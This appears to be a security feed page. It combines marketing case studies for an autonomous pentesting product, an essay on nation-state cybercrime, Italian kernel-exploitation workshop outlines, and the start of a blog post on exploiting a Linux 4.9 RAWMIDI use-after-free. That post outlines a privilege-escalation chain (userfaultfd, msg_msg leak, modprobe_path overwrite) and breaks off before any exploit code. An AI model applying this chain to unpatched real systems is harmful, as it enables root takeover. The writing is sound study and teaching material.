Normal view

There are new articles available, click to refresh the page.
Before yesterdayPentest/Red Team

Higher Education Organization Improves Cybersecurity Posture with NodeZero

16 November 2022 at 20:18

When the director of technology for a higher education organization went looking for a better way to identify and prioritize security weaknesses on the school’s servers and networks, his first interaction with and NodeZero started off with an impressive bang.

“I wanted to see proof of concept, and solved one of our biggest security holes because of that PoC,” or proof of concept, he says. On the first op, NodeZero was able to compromise the domain admin account.
Not just one account, in fact, but four, via an LLMNR vulnerability.

Without a lot of work, we were able to clean that up before we even licensed NodeZero – that was huge,
says their IT director.

Cybersecurity presents a complex challenge for the school, as it is spread out over several campuses and managed remotely. The director of technology is their highest-ranking technology staff member at the organization. The role oversees 400 endpoints within the organization, in addition to securing roughly 600 students on their own VLAN/Subnet during the school year.

NodeZero offers more specificity

Previous pentesting options were helpful, but often left the team chasing down vulnerabilities that turned out to not actually be exploitable.

“Often, it was just informational, and didn’t really affect your security,” he says.

With, “One of the things that really struck me was that it isn’t just the tool – and the tool is fantastic – but it’s the people around the tool who are available, in the chat, scheduling meetings. When I was running the PoV (Proof of Value) someone was there.”

He was also sold on NodeZero by its capability to run on demand.

“What sold me on it was seeing it at work and, because we know security is a journey and not a destination, the idea of being able to continuously run scans and pentests is great,” he says.

The team now runs weekly pentests to maintain vigilant cybersecurity on their network, he notes.

Getting the most from your time

Time management and focusing effort is huge in maintaining a strong security posture. Chasing down every lead with equal time and energy isn’t helpful when we know that not every vulnerability is actionable.

“You have critical down to informational severity issues, but I believe a tool a lot more when it says this is a critical misconfiguration we have compromised – oh and by the way, here’s your hashed password,” he says. “When that’s happened, I recognized the first and last character and knew that was the password.”

Context scoring based on critical impacts helps hammer home where to best deploy limited resources to secure
the environment.

“It’s the difference between casing a house and saying how I might be able to break in – that window might not be locked, that door doesn’t seem secure. But if you can actually break in, that’s critical. It’s the difference between telling me something might happen versus something did happen.”

Easy fixes but you need to find them first

While the LLMNR vulnerability wasn’t a huge challenge to fix, discovering it was a bit of a shock, the Director of Technology explains – and that’s why regular tests are so helpful. Security is so expansive it’s hard to cover everything.

“We try to work to secure our network, but it’s possible for any organization to miss things or have little holes” in their security, he says. A solution like NodeZero can find those small gaps that leave the organization open to risks so the team can shore them up quickly and easily.

“With stuff like LLMNR, the fix isn’t hard if you have the tools to fix a lot of machines at once,” he says. It’s identifying those risks in the grander picture that is the real struggle.
NodeZero helps uncover what you don’t know, he says, and tells you how to fix it so you don’t spend time researching the answer.

“You’re not chasing your tail following a large list of vulnerabilities,” he says. “It cuts down the task of securing your network because you’re starting at the critical, most impactful things. You get a view of things you just aren’t going to have without a pentest.”

Since starting to incorporate NodeZero into their security profile, other features, such as external pentesting, have been released and added to the solution’s usefulness.

“There’s a lot of tools out there that just hand you the tool and you’re on your own,” he says.

“The support, being able to set up a time to answer a question, it’s all been helpful. They work with us as opposed to saying ‘We got ‘em, on to the next account.’”

Download as PDF

The post Higher Education Organization Improves Cybersecurity Posture with NodeZero appeared first on

Vulnerable ≠ Exploitable: A lesson on prioritization

13 September 2022 at 15:17

The Typical Approach

Pen testers, vulnerability scanners, and installed agents alert on potential vulnerabilities and breaches. You receive a list, or a notification, and you respond. Ever wonder how much of your time and effort is being wasted fixing things that don’t actually matter?

You may be surprised to hear that a large majority of all vulnerabilities are unexploitable. According to data compiled by Kenna, in 2020, only 2.7% of the vulnerabilities found appeared to be exploitable and only 0.4% of those vulnerabilities were actually observed to be exploited at all.

The prioritization of these low-risk or no-risk vulnerabilities alongside, or even above, the truly exploitable vulnerabilities can actually cause an organization’s security posture to suffer. It takes significant time and coordination to find the asset owners, bring them up to speed on the issue, prepare downtime for the asset, remediate the issue, and then confirm that the issue is remediated. Meanwhile, more critical vulnerabilities are waiting in line for their turn to be remediated. If you can’t properly prioritize, you will never secure your network.

A client came to with the goal of validating the services they were using for pentesting, vulnerability scanning and remediation. Their IT services had all been outsourced to a managed security service provider (MSSP) with a hefty price tag; they wanted to make sure they were getting what they paid for.

The MSSP had just conducted their annual pentest of the organization’s network environment. used NodeZero to assess the organization’s network, with the following comparative results:

Why Coverage and Accuracy Matter

The hardest part of cyber security is deciding what NOT to fix because of limited time and resources.

Manual Pen Testing creates an incomplete snapshot:

  • No exploits exist, or conditions to exploit are extrememly unlikely, for 22/28 of the MSSP’s critical findings
  • Poor enumeration leads to blind spots and incomplete fingerprinting – port scans are not enough!
  • Partial coverage leads to missed critical findings

Fixing 79% of the critical issues highlighted in the MSSP’s report would have been an inefficient use of time and effort. These so-called “critical issues” did not have exploits, were blindly assumed due to poor enumeration, or the conditions for exploitability were extremely unlikely.

Meanwhile, the MSSP’s team only identified one host vulnerable to BlueKeep, while NodeZero found an additional 11. NodeZero also proved three additional critical/high weaknesses, including easily guessable root access to a database server.

When the noise is removed, the critical findings are revealed.

The Difference

Thinking like an attacker gives you a distinct advantage as you devise a defensive strategy.

The attacker’s perspective asks:

  • What is an attacker interested in doing or achieving?
  • What methods are realistically at their disposal?
  • What things about your environment makes achieving their intentions possible, or even easy?

We believe that these questions can only be answered by an “attacker-mindset” pentest, which should be performed frequently on your entire environment so risks do not accrue, and should produce findings that guide your remediation actions with a heavy bias towards efficiency and return on investment. delivers these outcomes through NodeZero, our autonomous penetration testing-as-a-service (APTaaS) platform. NodeZero is an on-demand, self-service platform that is safe to run in production and requires no persistent or credentialed agents.

Within our Portal, we provide the following supporting information for every weakness NodeZero finds:

  • Path NodeZero followed to identify/discover the weakness.
  • Proof of exploitability of the weakness.
  • Context and severity of the finding, which can be used to determine business impact.
  • Fix action report you can follow to remediate the weaknesses.

The Future State

Overall, the comparison between the MSSP’s report and the NodeZero report shows that NodeZero provides broader coverage, proves exploitability, contextualizes weaknesses, and provides the defensive team with the information they need to fix what matters.

Our work with this client exemplifies the need for a proactive security posture that includes continuous assessment, so you can catch up, keep up and even stay ahead.

Catch Up

Identify exploitable attack paths that must be fixed immediately, significantly reducing the opportunities for exploitation, sensitive data exposure, elevated privileges or remote code execution.

Your first NodeZero operation will provide this insight and minimize the time spent dealing with false positives.

For me, the biggest benefit is the attack path identification and actual prioritization of the vulnerabilities. Other tools simply pull the CVE value, and we get hundreds of criticals and highs.

Keep Up

Establish a purple team culture to find exploitable problems, fix them and then verify that the problems no longer exist. Your red team should be working with your blue team to maximize coordination.

You can run multiple NodeZero operations per week – our licenses give you unlimited access.
Use NodeZero’s compare feature to power your security standups.

Stay Ahead

Continuously verify your security controls – tools, processes, policies – by measuring and optimizing your detection, remediation and compliance response times.

Use our reports to show your leadership and board where you stand. Not just a compliance checkbox; this is effective security.

The post Vulnerable ≠ Exploitable: A lesson on prioritization appeared first on

Patched ≠ Remediated: Healthcare Faces an Aggressive Threat Landscape

12 September 2022 at 16:23

Healthcare Data Breaches Bar Chart

The Challenge: Healthcare Faces an Aggressive Threat Landscape.

One of our clients, a leading U.S. hospital and healthcare system, consistently earns high marks for clinical excellence and is among the top 10 percent in the nation for patient safety. Recognizing the growing cybersecurity threats to healthcare organizations and importance of importance of maintaining compliance with regulatory standards like HIPAA, PCI, and other privacy rules, the organization’s IT staff worked hard to ensure a strong security posture.

Our client’s IT team had adopted many security best practices and tools, including state-of-the-art firewalls, vulnerability scanning, endpoint detection and response (EDR), automated patch management, network segmentation, and a managed security service provider (MSSP). In addition, the team began implementing a zero-trust architecture and has tools to monitor the many specialized medical devices on its hospital networks.

Even with these comprehensive security practices in place, the team wanted to do more. Hackers have increasingly targeted the healthcare industry. In 2020, over 600 data breaches of 500 or more patient records were reported. Ransomware attacks continue to be extensively used against healthcare organizations, and these attacks are becoming more costly.

The Solution: NodeZero™ Automated Red Teaming

Liberman Networks, a managed security and IT services company, recognized that even with their many controls implemented, our client could still be vulnerable to an attack.
Liberman Networks called on to help validate our client’s defenses and provide proof of what was truly effective and which deficiencies remained.

Our client used’s NodeZero – a fully autonomous SaaS offering that views the network from the attacker’s perspective – to conduct a comprehensive penetration test across its enterprise. In a matter of minutes and with virtually no configuration, NodeZero began its reconnaissance, mapping the organization’s infrastructure and over 8,400 hosts, probing for misconfigurations, open ports, and other vulnerabilities an attacker could exploit, whether alone or by chaining multiple weaknesses.
Patched does not equal Remediated Attack Path

The Findings: Unauthenticated Access to Domain Controller’s

NodeZero ran for eight days with no adverse impact to the network.

NodeZero identified 31 vulnerabilities with 278 unique attack paths, proofs for each, and remediation guidance.

The most significant and surprising finding was immediately communicated to our client by Liberman Networks – even before NodeZero completed its testing. Ten Microsoft Active Directory domain controllers included ZeroLogon – a “critical” and potentially catastrophic privilege escalation vulnerability allowing unauthenticated accesses to devices first disclosed a year prior to the NodeZero test. Worse, an exploit was publicly available, making the vulnerability an easy target. Had attackers targeted the vulnerable hosts they could have quickly created their own credentials and gained unfettered access to every system in the organization. The result could include stealing patient information and financial data or installing ransomware on our client’s endpoints and databases.

Patched does not equal Remediated Findings Stats

“We patched this back in February. All of our reporting shows it as patched.” — Director of Infrastructure

Lesson 1: Reporting Tools Can Lie.

At first, our client believed NodeZero was in error. They were diligent in their patching and their records showed a successful update for the ZeroLogon vulnerability months earlier. Our client also had evidence; reporting from Qualys and Microsoft Deployment Image Servicing and Management (DISM) showed all systems were patched, and they trusted their tools.

In this case trusting the tools was a mistake. Liberman Networks and’s customer success team investigated further and confirmed that the updates had been unsuccessful. When our client reapplied patches to the 10 servers, a subsequent test by Liberman Networks and showed that 4 of the 10 devices remained vulnerable – despite showing as patched – again – in Microsoft.

A security solution blocked security updates for 18 months.

After further analysis, our client found the problem; a misconfiguration in their EDR solution had blocked patches on the domain controllers for the past 18 months! The failures were not propagated back to the patch management system, resulting in their vulnerability management and monitoring tools to incorrectly report a successful patch install. After manually pushing patches to each domain controller NodeZero was quickly re-run, proving that the problem had truly
been remediated.

“This is a good experience for me to teach the team the importance of credential use and reuse. We never would have found this vulnerability without NodeZero.” — Director of Infrastructure

Patched does not equal Remediated Timeline

Lesson 2: Patching ≠ Remediation

The lesson our client learned was simple; patching is not the same as remediating. Our client followed standard best practices in the defenses. They tracked security updates to their systems, promptly patched for critical issues using industry-leading tools and verified the patches using Microsoft DISM. As they saw, the tools can be wrong, leaving organizations vulnerable to attacks.

With assistance from and Liberman Networks, our client’s IT staff improved their security profile and their internal in monitoring, detection, and response skills. The IT team’s increased knowledge and confidence is generating greater trust in IT by the business. By using an offensive strategy to test its defenses, the healthcare system is evolving its cybersecurity posture to match the threat landscape that it faces.

Lesson 3: Follow Patch Tuesday with Pentest Wednesday.

According to the NIST Cyber Security Framework, organizations should validate through systematic audit and assessment that they have truly fixed vulnerabilities after deploying patches. In reality, most IT teams lack the resources to do penetration testing after every patch.

After their experience with misreported patching – with proof from Liberman Networks and NodeZero – our client added a step to “Patch Tuesday”: “Pentest Wednesday” with NodeZero to validate all patches are correctly implemented and risks are mitigated.

Download as PDF

The post Patched ≠ Remediated: Healthcare Faces an Aggressive Threat Landscape appeared first on

Workshop: Linux Kernel Exploitation 101 – Part 2

By: o___o
12 September 2022 at 07:25
Read Time:1 Minute, 24 Second

Materiale utilizzato nel video (per poter replicare i lab):
Il materiale è stato testato con Ubuntu 20.04 con architettura x86_64. Non dovrebbero esserci problemi con altre release.

Per iscriverti al workshop del 25 settembre, segui le pagine social di Cyber Saiyan (organizzazione di Romhack)

  • Linkedin:
  • Twitter:
  • Link all’evento:

Inoltre, per rimanere aggiornato su progetti futuri, seguici su Linkedin e Twitter:

  • Linkedin:
  • Twitter:
  • Website:

0:00 Introduzione
0:25 Introduzione a gdb
1:18 Compilare il kernel con simboli
3:00 Navigazione codice sorgente
3:41 Navigazione codice sorgente: Elixir
7:04 Navigazione codice sorgente: search_binary_handler
12:33 Kernel Debugging
12:56 Qemu kernel debugging
13:42 Kernel Debugging: gdb
15:25 Kernel Debugging: search_binary_handler
19:56 Infarinatura su assembly intel
33:46 struct task_struct
34:40 arch/
37:51 task_struct
40:20 init_task
41:04 Kernel Debugging: init_task
47:41 Common Vulnerabilities
48:55 Memory Corruption & Weird Machine
51:25 Common Mitigations (Introduzione)
54:03 Heap Overflow
56:06 Lab: Heap Overflow
1:07:42 Use-After-Free
1:09:33 Lab: Use-After-Free
1:16:28 KASLR
1:17:34 SMAP & SMEP
1:19:44 SMEP
1:21:25 SMAP
1:22:54 SMAP & SMEP: x86 vs ARM
1:23:50 Exploitation Strategies
1:27:14 Victim Object
1:29:15 Victim Object: Pre-requisiti
1:29:48 Victim Object: Esempio
1:31:11 Lab: Victim Object
1:36:40 Lab: Victim Object – offset init_task
1:42:13 Conclusione

0 0 %
0 0 %
0 0 %
0 0 %
0 0 %
0 0 %

Workshop: Linux Kernel Exploitation 101 – Part 1

By: o___o
12 September 2022 at 07:22
Read Time:1 Minute, 15 Second

Materiale utilizzato nel video (per poter replicare i lab):
Il materiale è stato testato con Ubuntu 20.04 con architettura x86_64. Non dovrebbero esserci problemi con altre release.

Per iscriverti al workshop del 25 settembre, segui le pagine social di Cyber Saiyan (organizzazione di Romhack)

  • Linkedin:
  • Twitter:
  • Link all’evento:

Inoltre, per rimanere aggiornato su progetti futuri, seguici su Linkedin e Twitter:

  • Linkedin:
  • Twitter:
  • Website:

00:00 Introduzione video
00:41 Introduzione workshop
1:14 Cos’è il kernel
4:04 User-Mode vs Kernel-Mode e Protection Ring
6:53 Syscall: User-Mode =} Kernel-Mode
8:18 Lab: Syscall
19:45 Kernel =} Hardware
21:13 Hardware =} Kernel
22:02 Kernel Memory
22:13 Stack vs Heap
23:48 Heap Memory Management: SLAB SLOB SLUB
24:33 SLUB
27:12 Partial slabs
29:34 SLUB API
31:08 Page Tables: User vs Kernel pointers
34:26 copy_from_user & copy_to_user
36:14 Lab: Introduzione Setup
38:02 Lab: Stack vs Heap
38:15 Lab: KRWX
39:33 Lab: Character device
40:44 Lab: file_operations
41:58 Lab: module_init & module_exit
42:28 Lab: Stack vs Heap
43:43 Lab: Heap & /proc
45:40 Lab: slabinfo & /sys/kernel/slab
49:21 Lab: KRWX & SLUB
1:02:02 Conclusione

0 0 %
0 0 %
0 0 %
0 0 %
0 0 %
0 0 %

Healthcare Staffing Organization Puts Cybersecurity Best Practices in Place with NodeZero

31 August 2022 at 15:29

The director of security engineering at a national healthcare staffing organization grew up wanting to be a hacker, and he found that NodeZero’s ability to provide the attacker’s perspective to help better protect his organization was a perfect fit for keeping his organization safe.

“Security has always been on my mind. Protecting company assets have always been on my mind. We’d reached a point where our organization is big enough, people are working remotely, and I wanted to split off some of my roles and be ultimately dedicated to security,” he says.

One of the challenges he has faced over the years has been convincing the c-suite to focus on security. They always had compliance in mind and policies in place, but the organization struggles with aging software without a development cycle or vendors who didn’t support software when it aged out or broke down.

As a publicly traded company, they ran their annual penetration tests on their roughly 900-1,200 hosts and performed well – they had a strong firewall in place protecting them from outside threats.

“But we have ancient software inside, and one of the great things about NodeZero is that it’s internally focused. In my mind, that’s where the threats will come from,” he says.

The first time he ran NodeZero, it was able to obtain domain admin access in 17 minutes via an overlooked machine that shared a password with other machines. It also surfaced risks and vulnerabilities that those aging machines and systems internally may have otherwise made difficult to find.

“We have folks, who have come and gone, who may have built servers I’m not aware of, that we don’t know about until NodeZero finds them, finds the misconfigurations, and helps us remediate them,” he says.

Immediate, Actionable Results

Before NodeZero, the organization would run one external pentest and one scan to check on their remediation actions.

The pentest would, regardless of vendor, use the same tools.

“You get a PDF telling your execs how you suck, and 99 percent of the stuff that says you suck are things that are such low priority you don’t care about them,” he says. “I love that with NodeZero, those are identified as low-priority, such as expired SSL certs, very minor things.”

Because other options all felt cookie cutter, with no difference in quality, leadership simply wanted the cheapest, easiest option to check that box. Cost was always a struggle – with security being seen as an annoying expense – until a key leader re-joined the company having survived a ransomware attack with his previous organization who now had security at top of mind.

“He asked, what are you missing? I told him endpoint protection, and we had the contract signed the next day,” he says.

When it came time for addressing pentesting, there was some pushback between the dev and infrastructure teams, but once they ran a demo of NodeZero, the teams fell in line.

I showed the demo to our network guy, who’s as big a cynic as I am and he was blown away, saying ‘this is what we need,’” he says.

This was all happening right around the time the Log4Shell vulnerability was the talk of the cybersecurity world.

“Log4j was everywhere,” he says, but running NodeZero offered actionable mitigation right away, whereas other tools they were using at the time had a lag time of weeks.

From Once a Year to Once a Month

The organization now runs NodeZero once a month, and then retests mid-month. With NodeZero they’re able to show progress better than ever before.

“Audit and compliance guys would look at the number of vulnerabilities in a 90-day period and say the numbers have gone up, you haven’t fixed anything,” he says. “But we’re able to show them that these are new weaknesses, and that new vulnerabilities come up all the time. We’re not being measured against those 90 days, and we can compare in the middle of the month to see what’s been fixed.”

In fact, with NodeZero running, the only issues his team has not fixed are due to manpower, not because of testing.

“Honestly, anything that hasn’t been addressed is a resource issue on our side,” he explained.

And, NodeZero has helped improve their results from other tools and resources. They were able to improve notification of attacks from their MSSP from four hours to fifteen minutes and validated their endpoint protection by verifying that the pentests are immediately detected and alerts issued – all enabling them to get more out of existing expenditures.

NodeZero has improved their overall accuracy, such as identifying a false positive that came up time and time again with Adobe Flash that was no longer being used but could not be removed from some older machines.

Doing Things Other Vendors Don’t

“I don’t think you have any other competitors,” he says. “I’d a have to go out and get a red team to do what NodeZero does, and it would cost twice as much for one scan.”

He also appreciates that NodeZero doesn’t just stop when it finds a vulnerability – it keeps digging. “It chains attacks, which other pentesters don’t do,” he says. “Hackers don’t say hey, I got access to this, I’ll stop here. That’s not how they operate.”

As a once-aspiring hacker himself, their director of security engineering knows that anyone who says they are 100% secure is either dishonest or naïve.

“You are going to get breached. It’s going to happen,” he says. “But the more you understand, the better you can lock things down and limit the blast radius.”

If you’d like to see how NodeZero works with your organization, have our experts walk you through a demo.

Download the PDF version

The post Healthcare Staffing Organization Puts Cybersecurity Best Practices in Place with NodeZero appeared first on

An International Look at Cybercrime

29 August 2022 at 15:19

Authoritarian regimes have learned in recent years that cybercrime can be a profitable economic enterprise ­– so much so that they continue to invest substantial resources in large- and small-scale cybercrime. This lucrative work goes on to fund their governments and their lavish lifestyles, among other things.

These nefarious nation state actors – North Korea, Iran, Russia, and China – all steal large sums of money by targeting Western infrastructure, private and public organizations, and sometimes even outspoken entities that speak openly against each of them. Furthermore, these nation state actors have long seen the West as an existential threat on the global stage for a multitude of reasons, especially in the realms of economy, infrastructure, intelligence and military affairs.

Economically, the battle between communism and capitalistic agendas rages on, with stiff competition between Eastern and Western technology, energy, manufacturing, and more For example, China uses its global Belt and Road initiative (BRI) under the guise of helping struggling economies to gain influence and essentially creating debt traps for unsuspecting countries. Meanwhile, maritime power has reemerged as a vehicle for control and asserting dominance over disputed territories (referring to China’s ambitions for Taiwan and controlling the parts of the Pacific, so far, an icy stalemate). Conflicts are also being fought on land, as seen with Russia’s invasion of Ukraine and Iran’s continued tensions with Israel and the U.S. regarding their nuclear agenda.

The Link Between Cybersecurity and Geopolitics

With this gradual increase in global cyber competition, it is no wonder that nation states continue to invest in cyber infrastructure and predominantly fight in the cyber world. Many are correct to believe that cybersecurity and geopolitics are directly linked. If anything, businesses have learned this lesson the hard way. Just because they are private sector and a multinational organization does not mean they are invincible to an enemy nation’s ransomware and cyberattacks. Or better yet, a private business operating abroad becomes a target for spyware (China BRI and cyber giant Huawei) out of the suspicion they are harboring their home country’s government secrets and hold “the keys to the castle.”

Overall, despite a nation state’s obvious agenda for zeroing in on military and government targets, such adversaries have become bolder and less dismissive of attacking private businesses, regardless of that company’s allegiance to serving consumers internationally. For example: As of late, many have pointed fingers at Russia to blame for recent attacks on American companies as big as Microsoft, Apple, Cisco (etc.) as well as being the true culprits of the SolarWinds fiasco in 2020.

As Dangerous as the Wild West

Due to such actions, the cyber world is now as dangerous as the Wild West. The question is, how are businesses and everyday citizens supposed to live while being caught in the chaotic influx of criminalistic and outlaw-ish rivalry?

The answer is: They do not. Cybersecurity has become a constant in daily life, and enemy nation states are part of the reason why. Every day, another business is on the news because it has been hacked by foreign threat actors who, with sophisticated and unsophisticated techniques, manage to destroy the finances, ambitions, and public reputation of a once-respected economic contributor.

Looking back to 10 years ago, it would be hard to believe then believe that extraordinary measures (such as firewalls, multi-factor authentication, intrusion detection and prevention systems, etc.) would now need to be implemented to defend against malicious advanced persistent threats (APTs). However, business today means realizing that nobody is safe. It does not matter anymore what industry an organization belongs to or what product they peddle.

Unfortunately, businesses across the globe are not safe from APTS, regardless of industry, sector or affiliation. APTS tactics techniques and procedures (TTPs) continue to advance, and so should business TTPs when protecting against threats.

Therefore, every private institution needs to align their policies to thinking “security first.” While most businesses have IT departments, many still lack a well-trained and sophisticated cybersecurity team within their organization. Such changes for a more secure network and security structure need to be made, as well as recruiting for the people who can do the job effectively (not just a one-person team). If companies fail to get started before it is too late, most of the world will find themselves at the mercy of cyber outlaws and APTS.

This post was authored by the Cyber Threat Analyst Team: Al MartinekCorey Sinclair and Taylor Ellis. 

The post An International Look at Cybercrime appeared first on

NodeZero: Filling a Unique Niche in Cybersecurity

23 August 2022 at 16:18

When an IT and cybersecurity team from a U.S.-based management consulting organization were searching for ways to improve their penetration testing, NodeZero and were able to answer the call.

“We’d done some penetration testing in the past, and it was quite expensive,” says the organization’s infrastructure manager. “We were looking to do this on a more regular cadence and looking at different solutions we could implement.”

After running into a team member from, they shared a rundown of what they were looking for and felt that NodeZero might be just what the situation called for.

“I liked the ease of implementation and use of the product,” he says. “And the ability to just do constant scanning and fixes without having to pay for every instance was the biggest appeal.”

The organization’s director of IT noted that there were solutions he’d encountered that could do external pentesting, but what they really needed at this stage was powerful internal pentesting capabilities.

“Looking at vulnerabilities and criticality was key for us,” he says. “And the biggest thing for me was having a full-package pentest, with all the functionality you needed to really look for and tackle vulnerabilities accordingly.”

The struggle to keep up

The organization’s biggest struggle at the time was simply being able to keep up with a small team – they didn’t have a dedicated team member to keep up with alerts and investigations.

“We wanted to be able to identify vulnerabilities ahead of time and keep ahead of the game,” says their infrastructure manager. “In the past, when we were doing scans, we were able to identify issues – fortunately none required significant time to fix – but being able to identify those things and act on them before they can be exploited is huge for us with a small team.”

“In looking at and enforcing our security strategy, we’re trying to implement controls – and with NodeZero, we’re able to implement the right controls and software we need to better our environment,” says their director of IT.

This also helps with various compliance requirements, a key component to the security team’s mission, as well as uncover any major vulnerabilities in the environment.

More frequent testing

The team wanted to be able to go in and do internal ops more often, something NodeZero makes uniquely possible.

“Being able to perform on-demand scans is really great – we can scan, make adjustments, and then run another scan to verify we’ve been successful,” says their infrastructure manager.

“We’re taking security to a higher level within the organization to obtain certifications in compliance, and this is going to help with that a lot,” says their director of IT.

Cost effectiveness and efficiency

One of the strongest draws to NodeZero was the ability to run those repeated pentest operations anytime and anywhere they needed them – without incurring additional costs.

“It’s just much more cost effective and easier to deal with the licensing,” says their infrastructure manager.

And to be able to run those operations for internal pentesting set it apart from other options on the market, says their director of IT.

“It’s one thing attacking an organization from the outside, but when attacking from the inside, you need to understand it and have the capabilities to do it,” he says. “I feel NodeZero has the capacity to do that.”
Getting up and running with NodeZero was quick and easy rather than adding cycles to a team that was already running lean.

“Setting up a scan is relatively quick and painless to do,” says their infrastructure manager.

“And even the reports are very intuitive – what the report surfaces and what we need to do to mitigate that,” says their director of IT.

It’s also enabled a frequency of testing they wanted, rather than being limited by the time and cost of standard penetration tests. Before NodeZero, the organization conducted pentests once or twice a year. They already plan to increase this to quarterly, or more – maximizing their return on investment.

NodeZero enables customers to turn a small team into their own seasoned and veteran team.

“It takes a lot of the work our team would have to go through to conduct these investigations, finds vulnerabilities and tells us what needs to happen, and even ranks those vulnerabilities and tells us why something should be considered more urgent than others,” says their infrastructure manager. “It helps prioritize work for optimal impact and address those issues that are going to be critical
to our environment soonest.”

“NodeZero, I think, fills a huge missing niche. Not just the skill set or background of company but the actual product, enabling you to do internal and external vulnerability testing to mitigate the issues most people are facing,” says their director of IT.

If you’d like to see how NodeZero works with your organization, have our experts walk you through a demo.

Download the PDF version

The post NodeZero: Filling a Unique Niche in Cybersecurity appeared first on

Linux Kernel Exploit Development: 1day case study

13 June 2022 at 10:01
Read Time:25 Minute, 51 Second


I was searching for a vulnerability that permitted me to practise what I’ve learned in the last period on Linux Kernel Exploitation with a “real-life” scenario. Since I had a week to dedicate my time in Hacktive Security to deepen a specific argument, I decided to search for a public vulnerability without a public exploit to develop it by myself. After a quick introduction on how I found the known vulnerability, I will detail the exploitation phase of a race condition that leads to a Use-After-Free in Linux kernel 4.9.


This blog post has two parts:

  • Vulnerability hunting: About public resources to identify known vulnerabilities in the Linux Kernel in order to practise some Kernel Exploitation in a real-life scenario. These resources includes: BugZilla, SyzBot, changelogs and git logs.
  • Kernel Exploitation: The vulnerability is a Race Condition that causes a write Use-After-Free. The race window has been extended using the userfaultd technique handling page faults from user-space and using msg_msg to leak a kernel address and I/O vectors to obtain a write primitive. With the write primitive, the modprobe_path global variable has been overwritten and a root shell popped.

Public bugs

The first thing I asked myself was: how do I find a suitable bug for my purpose? I excluded searching it by CVE since not all vulnerabilities have an assigned CVE (and usually they are the most “famous” ones) and that’s when I used the most powerful hacking skill: googling. That led me to various resources that I would like to share today starting by saying that that’s only the result of my personal work that could not reflect the best way to perform the same job. That said, this is what I’ve used to find my “matched” Nday:

  • Bugzilla
  • SyzBot
  • Changelogs
  • Git log

Kernel changelogs is definetly my favourite one but let’s say few words on all of them.


BugZilla is the standard way to report bugs in the upstream Linux kernels. You can find interesting vulnerabilities organised by subsystem (e.g. Networking with IPv4 and IPv6 or file system with ext* types and so on) and you can also search for keywords (such as “overflow”, “heap”, “UAF” and so on ..) using the standard search or the more advanced one. The personal downside is the mix of a lot of “non vulnerabilities”, hangs and stuff like that. Also, you do not have the most powerful search options (e.g. some bash). However, it is still a good option and I personally pinned few vulnerabilities that i excluded afterwards.


“syzbot is a continuous fuzzing/reporting system based on syzkaller fuzzer” (Introducing the syzbot dashboard).
Not the best GUI but at least you can have a lot of potentially open and fixed vulnerabilties. There isn’t a built-in search option but you can use your browser’s one or parse the HTML with an HTML parser. One of the downside, beyond the lack of searching, is the presence of tons of false-positives (in the “Open section”). However, upsides are pretty good: you can find open vulnerabilites (still not fixed), reproducers (C or syzlang), fixed commits and reported issues have the syzkaller nomenclature that is pretty self-explainationary.

Syzkaller-bugs (Google Group)

The lack of a search functionality in syz-bot is well replaced by the “syzkaller-bugs” Google Group from where you can find syz-bot reported bugs with additional information from the comment section and an enanched search bar. I really enjoy this option !


That’s my favourite method: download all changelogs from the kernel CDN of your desired kernel version and you can enjoy all downloaded files with your favourite bash commands. This approach is similar to search from git commits but with the advantage that it is way faster. With some bash-fu, you can download all changelogs for a target kernel version (e.g. 4.x) with the following inline: URL= && curl $URL | grep "ChangeLog-4.9" | grep -v '.sign' | cut -d "\"" -f 2 | while read line; do wget "$URL/$line"; done.
Once all changelogs have been downloaded it’s possible to grep for juicy keywoards like UAF, OOB, overflow and so on. I found very useful to display text before and after the selected keyword, like: grep -A5 -B5 UAF *. In that way, you can instantly have quick information about vulnerability details, impacted subsystem, limitations, ..
For each identified vulnerability, it’s possible to see its patch by diffing the patch commit with the previous one (linux source from git is needed): git diff <commit before> <commit patch>.

Git log

As said before, this is a similar approach to the “Changelogs” method. The concept is pretty simple: clone the github repository and search for juicy keywoards in the commit history. You can do that with the following commands:

git clone git://
cd linux-stable
git checkout -f <TAG -> # e.g. git checkout -f v4.9.316 (from
git log > ../git.log

In that way, you can do the same thing as before on git.log file. The big downside, however, is that the file is too big and it takes more time (11.429.573 lines on 4.9.316). That’s the reason why I prefer the “Changelog” method.

Hunt for a good vulnerability

I was searching for an Use-After-Free vulnerability and I started to search for it in all mentioned resources: BugZilla, SyzBot, Changelogs and git history. I wrote them down in a table with a resume description in order to further analyze them later on. I started to dig into few of them viewing their patch and source code in order to understand reachability, compile dependencies and exploitability. I strumbled into an interesting one: a vulnerability in the RAWMIDI interface (commit c13f1463d84b86bedb664e509838bef37e6ea317). I discovered it with the “Changelog” method, by searching for the “UAF” keyword reading the previous and next five lines: grep -A5 -B5 UAF *. By seeing its behaviours, I was convinced to go with that vulnerability, an Use-After-Free triggered in a race condition.

RAWMIDI interface

Before facing the vulnerability, let’s see few important things needed to follow this write-up. The vulnerable driver is exposed as a character device in /dev/snd/midiC0D* (or similar name based on the platform) and depends on CONFIG_SND_RAWMIDI. It exposes the following file operations:

static const struct file_operations snd_rawmidi_f_ops =
	.owner =	THIS_MODULE,
	.read =		snd_rawmidi_read,
	.write =	snd_rawmidi_write,
	.open =		snd_rawmidi_open,
	.release =	snd_rawmidi_release,
	.llseek =	no_llseek,
	.poll =		snd_rawmidi_poll,
	.unlocked_ioctl =	snd_rawmidi_ioctl,
	.compat_ioctl =	snd_rawmidi_ioctl_compat,

The ones we are interesed into are openwrite and unlocked_ioctl.


The open (snd_rawmidi_open) operation allocates everything needed to interact with the device, but what is just necessary to know for us is the first allocation of snd_rawmidi_runtime->buffer as GFP_KERNEL with a size of 4096 (PAGE_SIZE) bytes. This is the snd_rawmidi_runtime struct:

struct snd_rawmidi_runtime {
	struct snd_rawmidi_substream *substream;
	unsigned int drain: 1,	/* drain stage */
		     oss: 1;	/* OSS compatible mode */
	/* midi stream buffer */
	unsigned char *buffer;	/* buffer for MIDI data */
	size_t buffer_size;	/* size of buffer */
	size_t appl_ptr;	/* application pointer */
	size_t hw_ptr;		/* hardware pointer */
	size_t avail_min;	/* min avail for wakeup */
	size_t avail;		/* max used buffer for wakeup */
	size_t xruns;		/* over/underruns counter */
	/* misc */
	spinlock_t lock;
	wait_queue_head_t sleep;
	/* event handler (new bytes, input only) */
	void (*event)(struct snd_rawmidi_substream *substream);
	/* defers calls to event [input] or ops->trigger [output] */
	struct work_struct event_work;
	/* private data */
	void *private_data;
	void (*private_free)(struct snd_rawmidi_substream *substream);


